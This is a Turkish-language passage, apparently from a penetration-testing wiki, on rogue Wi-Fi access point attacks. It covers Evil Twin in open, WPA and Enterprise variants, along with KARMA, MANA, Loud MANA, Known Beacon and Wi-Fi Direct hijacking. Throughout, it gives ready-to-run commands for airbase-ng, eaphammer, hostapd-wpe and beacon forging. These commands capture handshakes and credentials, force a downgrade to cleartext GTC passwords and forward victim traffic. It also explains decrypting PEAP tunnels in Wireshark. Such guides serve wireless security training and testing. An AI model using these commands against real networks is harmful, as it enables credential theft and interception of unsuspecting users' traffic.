iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

Evil twin saldırısı, WiFi istemcilerinin ağları tanıma şekillerini istismar eder, esasen ağ adını (ESSID) kullanarak, temel istasyonun (erişim noktası) istemciye kendini doğrulamasını gerektirmeden. Anahtar noktalar şunlardır:

  • Ayrım Zorluğu: Cihazlar, aynı ESSID ve şifreleme türüne sahip olduklarında meşru ve sahte erişim noktalarını ayırt etmekte zorlanır. Gerçek dünya ağları genellikle kapsama alanını kesintisiz uzatmak için aynı ESSID'ye sahip birden fazla erişim noktası kullanır.
  • İstemci Geçişi ve Bağlantı Manipülasyonu: 802.11 protokolü, cihazların aynı ESS içindeki erişim noktaları arasında geçiş yapmasına olanak tanır. Saldırganlar, bir cihazı mevcut temel istasyonundan ayırıp sahte birine bağlanmaya ikna ederek bunu istismar edebilir. Bu, daha güçlü bir sinyal sunarak veya meşru erişim noktasına olan bağlantıyı deauthentikasyon paketleri veya sinyal karıştırma gibi yöntemlerle keserek gerçekleştirilebilir.
  • Uygulama Zorlukları: Birden fazla, iyi yerleştirilmiş erişim noktasının bulunduğu ortamlarda evil twin saldırısını başarıyla gerçekleştirmek zor olabilir. Tek bir meşru erişim noktasını deauthentikasyon yapmak, genellikle cihazın başka bir meşru erişim noktasına bağlanmasına neden olur, saldırgan tüm yakın erişim noktalarını deauthentikasyon yapamazsa veya sahte erişim noktasını stratejik olarak yerleştiremezse.

Çok temel bir Open Evil Twin (İnternete trafik yönlendirme yeteneği olmadan) oluşturabilirsiniz:

bash
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

eaphammer kullanarak bir Evil Twin de oluşturabilirsiniz (eaphammer ile evil twin oluşturmak için arayüzün monitor modunda olmaması gerektiğini unutmayın):

bash
./eaphammer -i wlan0 --essid exampleCorp --captive-portal

Ya da Airgeddon kullanarak: Options: 5,6,7,8,9 (Evil Twin saldırı menüsü içinde).

Lütfen, varsayılan olarak PNL'deki bir ESSID WPA korumalı olarak kaydedilmişse, cihazın otomatik olarak Açık bir evil Twin'e bağlanmayacağını unutmayın. Gerçek AP'yi DoS yapmayı deneyebilir ve kullanıcının manuel olarak Açık evil twin'inize bağlanmasını umabilirsiniz, ya da gerçek AP'yi DoS yapabilir ve el sıkışmayı yakalamak için bir WPA Evil Twin kullanabilirsiniz (bu yöntemi kullanarak kurbanın size bağlanmasını sağlayamazsınız çünkü PSK'yı bilmiyorsunuz, ancak el sıkışmayı yakalayabilir ve kırmaya çalışabilirsiniz).

Bazı işletim sistemleri ve antivirüs yazılımları, Açık bir ağa bağlanmanın tehlikeli olduğunu kullanıcıya bildirecektir...

WPA/WPA2 Evil Twin

WPA/2 kullanarak bir Evil Twin oluşturabilirsiniz ve eğer cihazlar o SSID'ye WPA/2 ile bağlanacak şekilde yapılandırılmışsa, bağlanmaya çalışacaklardır. Her durumda, 4-yol el sıkışmasını tamamlamak için ayrıca müşterinin kullanacağı şifreyi bilmeniz gerekiyor. Eğer bilmiyorsanız, bağlantı tamamlanmayacaktır.

bash
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Kurumsal Kötü İkiz

Bu saldırıları anlamak için önce WPA Enterprise açıklaması okunmasını öneririm.

hostapd-wpe Kullanımı

hostapd-wpe çalışmak için bir konfigürasyon dosyasına ihtiyaç duyar. Bu konfigürasyonların oluşturulmasını otomatikleştirmek için https://github.com/WJDigby/apd_launchpad kullanılabilir (//etc/hostapd-wpe/ içindeki python dosyasını indirin).

bash
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

Yapılandırma dosyasında ssid, kanal, kullanıcı dosyaları, cret/key, dh parametreleri, wpa versiyonu ve kimlik doğrulama gibi birçok farklı şeyi seçebilirsiniz...

Herhangi bir sertifikanın giriş yapmasına izin vermek için EAP-TLS ile hostapd-wpe kullanma.

EAPHammer Kullanımı

bash
# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Varsayılan olarak, EAPHammer bu kimlik doğrulama yöntemlerini amaçlar (ilk olarak düz metin şifrelerini elde etmeye çalışmak için GTC'yi ve ardından daha sağlam kimlik doğrulama yöntemlerinin kullanımını dikkate alarak):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Bu, uzun bağlantı sürelerini önlemek için varsayılan metodolojidir. Ancak, kimlik doğrulama yöntemlerini en zayıftan en güçlüsüne doğru sunmayı da belirtebilirsiniz:

--negotiate weakest

Or you could also use:

  • --negotiate gtc-downgrade yüksek verimli GTC downgrade uygulamasını (düz metin şifreleri) kullanmak için
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP sunulan yöntemleri manuel olarak belirtmek için (saldırının gerçekleştirileceği organizasyonla aynı sırada aynı kimlik doğrulama yöntemlerini sunmak, tespiti çok daha zor hale getirecektir).
  • Find more info in the wiki

Airgeddon Kullanımı

Airgeddon, daha önce oluşturulmuş sertifikaları kullanarak WPA/WPA2-Enterprise ağlarına EAP kimlik doğrulaması sunabilir. Sahte ağ, bağlantı protokolünü EAP-MD5'e düşürecektir, böylece kullanıcının ve şifrenin MD5'ini yakalayabilecektir. Daha sonra, saldırgan şifreyi kırmaya çalışabilir.
Airgeddon, size sürekli Evil Twin saldırısı (gürültülü) veya birisi bağlanana kadar sadece Evil Attack oluşturma (sakin) olanağını sunar.

Evil Twins saldırılarında PEAP ve EAP-TTLS TLS tünellerinin hata ayıklanması

Bu yöntem bir PEAP bağlantısında test edildi, ancak ben keyfi bir TLS tünelini şifre çözdüğüm için bu EAP-TTLS ile de çalışmalıdır.

hostapd-wpe konfigürasyonunun içinde dh_file içeren satırı yorumlayın ( dh_file=/etc/hostapd-wpe/certs/dh yerine #dh_file=/etc/hostapd-wpe/certs/dh )
Bu, hostapd-wpe'nin RSA kullanarak anahtar değişimi yapmasını sağlayacak, böylece daha sonra sunucunun özel anahtarını bilerek trafiği şifreleyebilirsiniz.

Şimdi, her zamanki gibi o değiştirilmiş konfigürasyonla hostapd-wpe kullanarak Evil Twin'i başlatın. Ayrıca, Evil Twin saldırısını gerçekleştiren arayüzde wireshark'ı başlatın.

Şimdi veya daha sonra (zaten bazı kimlik doğrulama girişimlerini yakaladığınızda) özel RSA anahtarını wireshark'a ekleyebilirsiniz: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

Yeni bir giriş ekleyin ve bu değerlerle formu doldurun: IP adresi = herhangi biri -- Port = 0 -- Protokol = veri -- Anahtar Dosyası (anahtar dosyanızı seçin, sorun yaşamamak için şifre korumalı olmayan bir anahtar dosyası seçin).

Ve yeni "Şifrelenmiş TLS" sekmesine bakın:

KARMA, MANA, Loud MANA ve Bilinen işaretler saldırısı

ESSID ve MAC kara/beyaz listeleri

Farklı türdeki Medya Erişim Kontrol Filtre Listeleri (MFACL'ler) ve bunların sahte Erişim Noktası (AP) üzerindeki modları ve etkileri:

  1. MAC tabanlı Beyaz Liste:
  • Sahte AP, beyaz listede belirtilen cihazlardan gelen sorgu isteklerine yalnızca yanıt verecek, listede olmayan diğer tüm cihazlara görünmez kalacaktır.
  1. MAC tabanlı Kara Liste:
  • Sahte AP, kara listedeki cihazlardan gelen sorgu isteklerini görmezden gelecek, böylece sahte AP bu belirli cihazlara görünmez hale gelecektir.
  1. SSID tabanlı Beyaz Liste:
  • Sahte AP, yalnızca belirli ESSID'ler için sorgu isteklerine yanıt verecek, bu ESSID'leri içermeyen cihazlara görünmez olacaktır.
  1. SSID tabanlı Kara Liste:
  • Sahte AP, kara listedeki belirli ESSID'ler için sorgu isteklerine yanıt vermeyecek, böylece bu belirli ağları arayan cihazlara görünmez hale gelecektir.
bash
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
bash
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Bu yöntem, bir saldırganın, ağlara bağlanmaya çalışan cihazlardan gelen tüm probe isteklerine yanıt veren kötü niyetli bir erişim noktası (AP) oluşturmasına olanak tanır. Bu teknik, cihazları, saldırganın AP'sine bağlanmaya kandırarak cihazların aradığı ağları taklit eder. Bir cihaz bu sahte AP'ye bir bağlantı isteği gönderdiğinde, bağlantıyı tamamlar ve cihazın yanlışlıkla saldırganın ağına bağlanmasına neden olur.

MANA

Daha sonra, cihazlar istenmeyen ağ yanıtlarını görmezden gelmeye başladı, bu da orijinal karma saldırısının etkinliğini azalttı. Ancak, Ian de Villiers ve Dominic White tarafından tanıtılan MANA saldırısı olarak bilinen yeni bir yöntem ortaya çıktı. Bu yöntem, sahte AP'nin cihazların yayınladığı probe isteklerine yanıt vererek Tercih Edilen Ağ Listelerini (PNL) yakalamasını içerir; bu yanıtlar, cihazlar tarafından daha önce talep edilen ağ adları (SSID'ler) ile yapılır. Bu sofistike saldırı, cihazların bildiği ağları hatırlama ve önceliklendirme şekillerini istismar ederek orijinal karma saldırısına karşı korumaları aşar.

MANA saldırısı, cihazlardan gelen hem yönlendirilmiş hem de yayınlanmış probe isteklerini izleyerek çalışır. Yönlendirilmiş istekler için, cihazın MAC adresini ve talep edilen ağ adını kaydeder, bu bilgiyi bir listeye ekler. Bir yayın isteği alındığında, AP, cihazın listesindeki ağlardan herhangi biriyle eşleşen bilgilerle yanıt verir ve cihazı sahte AP'ye bağlanmaya teşvik eder.

bash
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Bir Loud MANA saldırısı, cihazların yönlendirilmiş sorgulama kullanmadığı veya Tercih Edilen Ağ Listeleri (PNL) saldırgana bilinmediği durumlar için gelişmiş bir stratejidir. Bu, aynı alandaki cihazların PNL'lerinde bazı ağ adlarını paylaşma olasılığının yüksek olduğu prensibine dayanır. Seçici bir şekilde yanıt vermek yerine, bu saldırı gözlemlenen tüm cihazların birleştirilmiş PNL'lerinde bulunan her ağ adı (ESSID) için sorgu yanıtlarını yayınlar. Bu geniş yaklaşım, bir cihazın tanıdık bir ağı tanıma ve sahte Erişim Noktasına (AP) bağlanma girişiminde bulunma şansını artırır.

bash
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Known Beacon attack

Loud MANA attack yeterli olmadığında, Known Beacon attack başka bir yaklaşım sunar. Bu yöntem, bir ağ adıyla yanıt veren bir AP'yi simüle ederek bağlantı sürecini brute-force ile zorlar, bir kelime listesinden türetilen potansiyel ESSID'lerin bir listesini döngüsel olarak kullanır. Bu, birçok ağın varlığını simüle eder, umarak kurbanın PNL'sindeki bir ESSID ile eşleşmeyi, uydurma AP'ye bir bağlantı denemesi yapmayı teşvik eder. Saldırı, cihazları yakalamak için daha agresif bir deneme yapmak amacıyla --loud seçeneği ile birleştirilerek güçlendirilebilir.

Eaphammer, bu saldırıyı bir MANA saldırısı olarak uyguladı; burada bir listedeki tüm ESSID'ler kullanılır (bunu --loud ile birleştirerek Loud MANA + Known beacons saldırısı oluşturabilirsiniz):

bash
./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Bilinen Beacon Burst saldırısı

Bilinen Beacon Burst saldırısı, bir dosyada listelenen her ESSID için hızlı bir şekilde beacon çerçevelerinin yayınlanmasını içerir. Bu, sahte ağların yoğun bir ortamını yaratır ve cihazların sahte AP'ye bağlanma olasılığını büyük ölçüde artırır, özellikle de bir MANA saldırısıyla birleştirildiğinde. Bu teknik, cihazların ağ seçim mekanizmalarını aşmak için hız ve hacimden yararlanır.

bash
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct, cihazların geleneksel bir kablosuz erişim noktası olmadan Wi-Fi kullanarak doğrudan birbirleriyle bağlantı kurmalarını sağlayan bir protokoldür. Bu yetenek, yazıcılar ve televizyonlar gibi çeşitli Nesnelerin İnterneti (IoT) cihazlarına entegre edilmiştir ve doğrudan cihazdan cihaza iletişimi kolaylaştırır. Wi-Fi Direct'in dikkat çekici bir özelliği, bir cihazın bağlantıyı yönetmek için grup sahibi olarak bilinen bir erişim noktası rolünü üstlenmesidir.

Wi-Fi Direct bağlantıları için güvenlik, çeşitli güvenli eşleştirme yöntemlerini destekleyen Wi-Fi Protected Setup (WPS) aracılığıyla sağlanır. Bu yöntemler arasında:

  • Push-Button Configuration (PBC)
  • PIN girişi
  • Near-Field Communication (NFC)

Bu yöntemler, özellikle PIN girişi, geleneksel Wi-Fi ağlarındaki WPS ile aynı güvenlik açıklarına maruz kalmaktadır ve benzer saldırı vektörlerinin hedefi haline gelmektedir.

EvilDirect Hijacking

EvilDirect Hijacking, Wi-Fi Direct'e özgü bir saldırıdır. Evil Twin saldırısının konseptini yansıtır, ancak Wi-Fi Direct bağlantılarını hedef alır. Bu senaryoda, bir saldırgan meşru bir grup sahibini taklit ederek cihazları kötü niyetli bir varlığa bağlanmaya ikna etmeyi amaçlar. Bu yöntem, airbase-ng gibi araçlar kullanılarak, taklit edilen cihazın kanalını, ESSID'sini ve MAC adresini belirterek gerçekleştirilebilir:

References

TODO: Take a look to https://github.com/wifiphisher/wifiphisher (login con facebook e imitacionde WPA en captive portals)

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin